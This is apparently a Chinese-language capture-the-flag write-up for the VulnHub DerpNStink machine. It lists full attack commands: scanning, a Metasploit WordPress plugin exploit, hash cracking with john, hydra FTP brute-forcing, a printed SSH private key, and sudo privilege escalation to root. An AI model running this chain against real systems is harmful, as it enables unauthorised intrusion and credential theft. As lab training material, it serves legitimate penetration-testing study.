DerpNStink打靶思路详解(vulnhub)
第一步:信息收集
nmap -sn 192.168.31.0/24
确定靶机IP为192.168.31.122
再次使用nmap对靶机IP进行详细扫描
nmap -p- -sV -sT -O 192.168.31.122
结果如下
对 80 , 21 ,22 端口进行信息搜集
首先80端口
直接访问http://192.168.31.122/
然后使用 dirb 进行扫描
dirb http://192.168.31.122/
根据结果可以看到该靶机存在 wordpress 和 phpmyadmin 这两套 cms,访问 wordpress 后台,admin/admin直接进去了 。。。。。。。。。。。。。
然后 21 端口
ftp 192.168.31.122
尝试是否支持匿名用户进行访问
可以看出不允许
最后查看22端口
尝试一下弱口令
你妹的,只允许使用密钥登陆
第二步:WEB渗透
通过信息收集已经发现了该靶机使用了 wordpress 那就直接使用 wpscan
wpscan --url http://192.168.31.122/weblog/
需要将域名 derpnstink.local 与 IP 进行绑定,所以我们编辑 hosts 文件
然后再次使用 wpscan 进行扫描
wpscan --url http://derpnstink.local/weblog/ --enumerate p,t
存在这个插件,搜索一下
searchsploit slideshow
哈哈哈哈哈哈,这么多
那直接掏出我们的 msf
搜索
search slideshow
然后就简单了
use 1
show options
set RHOSTS 192.168.31.122
set WP_USER admin
set WP_PASSWORD admin
set TARGETURI /weblog/
run
哦成功了
进入交互
shell
增强交互
python -c 'import pty; pty.spawn("/bin/bash")'
然后再 /var/www/html/weblog/wp-config.php 找到了数据库账号密码
ps:本人尝试了脏牛提权,结果靶机的apache服务直接没了。。。。。。。
尝试访问 phpmyadmin http://192.168.31.122/php/phpmyadmin/ 使用 root/mysql 登入
那就直接查看 secure_file_priv 的值看看能不能进行 udf 提权
show variables like '%secure%'
emmmmmmm,有限制
那就查看表中所储存的密码
还是通过 md5 网站进行查询
我的天呐,解不出来
那就上 john
john DN.hash --wordlist=/usr/share/wordlists/rockyou.txt
得到密码为 wedgie57
本人使用 Unclestinky/wedgie57 进行登入,没有发现什么有用的信息
第三步:FTP渗透
首先通过刚才获取的低权限用户查看 /etc/passwd 文件,获取用户列表
然后通过 hydra 来进行爆破
hydra -L username.txt -P password.txt -t 5 -vV -o jg.txt 192.168.31.122 ftp
成功!!!!
那就登入
ftp 192.168.31.122
然后将所有文件都下载下来
挨个查看
derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
翻译:
12:06 mrderp:嘿,我不能再登录WordPress了。你能调查一下吗?
12:07 臭:是的。您需要重置密码吗?
12:07 mrderp:我想我不小心删除了我的帐户
12:07 mrderp:我只需要登录一次即可进行更改
12:07 Stinky:我要去抓包,这样我们就可以弄清楚发生了什么
12:07 Mrderp:这似乎有点矫枉过正,但WTV
12:08 臭味:启动嗅探器!!!
12:08 mrderp: -_-
12:10 臭:很好,我想我帮你修好了。您尝试登录吗?
12:11 MRDERP:太棒了!
12:12 Stinky:我们真的是最好的系统管理员 #team
12:13 Mrderp:我想我们是......
12:15 mrderp:好的,我做了更改,请随时取消我的帐户
12:20 臭臭:搞定了!耶
test.txt
vsftpd test file
翻译:
vsftpd 测试文件
key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
发现这是 ssh 密钥文件
第四步:后渗透
使用得到的密钥进行登入
ssh -i key.txt stinky@192.168.31.122
告诉我 key.txt 权限太开放,那就改权限
chmod 600 key.txt
再次连接:
ssh -i key.txt stinky@192.168.31.122
这个错误之前碰到过。能解决方法就是 -o PubkeyAcceptedKeyTypes=+ssh-rsa
ssh -i key.txt stinky@192.168.31.122 -o PubkeyAcceptedKeyTypes=+ssh-rsa
连接成功
根据刚才 derpissues.txt 里面的提示去找 pcap 包,并把他下载下来
scp -i key.txt -o PubkeyAcceptedKeyTypes=+ssh-rsa stinky@192.168.31.122:/home/stinky/Documents/derpissues.pcap /home/kali
然后使用 wireshark 打开
根据提示去找 http 流找密码
找到密码 derpderpderpderpderpderpderp
然后使用 mrderp/derpderpderpderpderpderpderp 登入
su mrderp
然后查看权限
sudo -l
然后就简单了
cd /home/mrderp
mkdir binaries
cd binaries/
echo '/bin/bash' > derpy.sh
chmod 777 derpy.sh
sudo ./derpy.sh
成功!!!
然后就是查看flag了
cd /root/Desktop
ls
cat flag.txt
至此完结,撒花。